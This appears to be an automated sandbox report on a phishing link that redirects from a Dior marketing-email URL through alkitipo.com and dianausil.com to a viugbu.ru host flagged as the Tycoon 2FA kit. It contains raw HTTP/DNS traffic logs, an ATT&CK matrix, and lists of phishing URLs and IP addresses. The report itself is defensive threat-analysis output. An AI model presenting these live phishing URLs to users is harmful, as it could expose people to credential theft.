cf_clearance=qNs1iY1VvRH90Ldoq1yEk.IxYRRXaV.XjHDpBJskUl4-1742380194-1.2.1.1-6JCfidD2ac1ldlMQ_J35HHpOaB1R2Qfd77afpZZaY6L38WJnRgGF3HbJn2.e_YfjrnLq4AbcuviEtgLFLi6GxCSB8fAreovMFHBRH6Kx8RGKvrKCYyQfc8HfmhPxpGL2V7RM3EsgKJOLmnmy1Isw5_Vffq.FczWDL_75R6f2X0vx5NM4V4Bns8PxfX1tyunl3.moUgvDLgJ5359Rrbq327WTEaCVdGApZaHTZmOf2cDxSH5swKuN_8jCjL4biGArDXjPSayB0.RkwzX9HXl6OgpoNmb9_5CaiJINx7tyLyG9UPpR0yTi7d3NcTC9QiBUu0H7HmviVAp6BwdbyYbgI1CAcAcGxz7hqx4aE5i64jA
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/966088071:1742376849:e-pQSDz4Bmg_iVm7Jg9F7dZQ1GSaY_NvFcx7L8UKqvA/922c4a999a2565e0/bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /IDLK/ HTTP/1.1Host: yg.dianausil.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://yg.dianausil.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://yg.dianausil.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://yg.dianausil.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://yg.dianausil.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://yg.dianausil.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=baUZHYVlkzDWHdtjPGRPAlXsRMlLkH3dcBB7aW8tGgE-1742380205-1.0.1.1-fKLznBsqT02FLvhayWl8hMdyCQhnycF19IVsdlB2oUdYbQLZAYtPUlzii7wOZw2yBIshojXraHd9oT7rsxAq1lNjFSs.hHsFwEx2eZcsn4A
              Source: global trafficHTTP traffic detected: GET /jawari@iczbbjab HTTP/1.1Host: luux.viugbu.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://yg.dianausil.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://yg.dianausil.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jawari@iczbbjab HTTP/1.1Host: luux.viugbu.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: email.mg.dior.com.sg
              Source: global trafficDNS traffic detected: DNS query: a6b7c1be5ea686d6c0c05e957.alkitipo.com
              Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: yg.dianausil.com
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: luux.viugbu.ru
              Source: global trafficDNS traffic detected: DNS query: via.placeholder.com
              Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
              Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/jsd/r/0.38274867399469387:1742376653:KH8maKPuUqiEMLR5OlzLIk_YKRD4m2JdO_m0T_WtFio/922c4a9648889f21 HTTP/1.1Host: a6b7c1be5ea686d6c0c05e957.alkitipo.comConnection: keep-aliveContent-Length: 16629sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8sec-ch-ua-mobile: ?0Accept: */*Origin: https://a6b7c1be5ea686d6c0c05e957.alkitipo.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2)
              Source: chromecache_78.6.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2)
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 172.217.16.132:443 -> 192.168.2.6:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.102.239.211:443 -> 192.168.2.6:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.5.130:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.5.130:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.5.130:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.6:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.6:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.214.184:443 -> 192.168.2.6:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.6:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.6:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.6:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.6.189:443 -> 192.168.2.6:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.6:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.148.100:443 -> 192.168.2.6:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.148.100:443 -> 192.168.2.6:55744 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir2104_894158437Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir2104_894158437Jump to behavior
              Source: classification engineClassification label: mal92.phis.evad.win@27/30@42/16
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,9831878234390128474,8964339834726454301,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88&"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,9831878234390128474,8964339834726454301,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:3Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88&"Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 1.7.d.script.csv, type: HTML
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              Browser Extensions
              1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              File Deletion
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1642816 URL: http://email.mg.dior.com.sg... Startdate: 19/03/2025 Architecture: WINDOWS Score: 92 15 yg.dianausil.com 2->15 17 www.google.com 2->17 19 2 other IPs or domains 2->19 31 Antivirus detection for URL or domain 2->31 33 Yara detected AntiDebug via timestamp check 2->33 35 Yara detected Tycoon 2FA PaaS 2->35 37 4 other signatures 2->37 7 chrome.exe 2 2->7         started        10 chrome.exe 2->10         started        signatures3 process4 dnsIp5 21 192.168.2.4 unknown unknown 7->21 23 192.168.2.6, 138, 443, 49475 unknown unknown 7->23 12 chrome.exe 7->12         started        process6 dnsIp7 25 yg.dianausil.com 172.67.214.184, 443, 49740 CLOUDFLARENETUS United States 12->25 27 142.250.184.228, 443, 55755 GOOGLEUS United States 12->27 29 14 other IPs or domains 12->29

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              http://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88&0%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/f3b948d8acb8/main.js?100%Avira URL Cloudphishing
              https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/cdn-cgi/challenge-platform/h/g/jsd/r/0.38274867399469387:1742376653:KH8maKPuUqiEMLR5OlzLIk_YKRD4m2JdO_m0T_WtFio/922c4a9648889f21100%Avira URL Cloudphishing
              https://luux.viugbu.ru/jawari@iczbbjab0%Avira URL Cloudsafe
              https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/favicon.ico100%Avira URL Cloudphishing
              https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/?cf_captcha=verified100%Avira URL Cloudphishing
              https://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88&0%Avira URL Cloudsafe
              https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/cdn-cgi/challenge-platform/scripts/jsd/main.js100%Avira URL Cloudphishing

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              luux.viugbu.ru
              172.67.148.100
              truefalse
                unknown
                a.nel.cloudflare.com
                35.190.80.1
                truefalse
                  high
                  code.jquery.com
                  151.101.66.137
                  truefalse
                    high
                    developers.cloudflare.com
                    104.16.6.189
                    truefalse
                      high
                      cdnjs.cloudflare.com
                      104.17.25.14
                      truefalse
                        high
                        challenges.cloudflare.com
                        104.18.94.41
                        truefalse
                          high
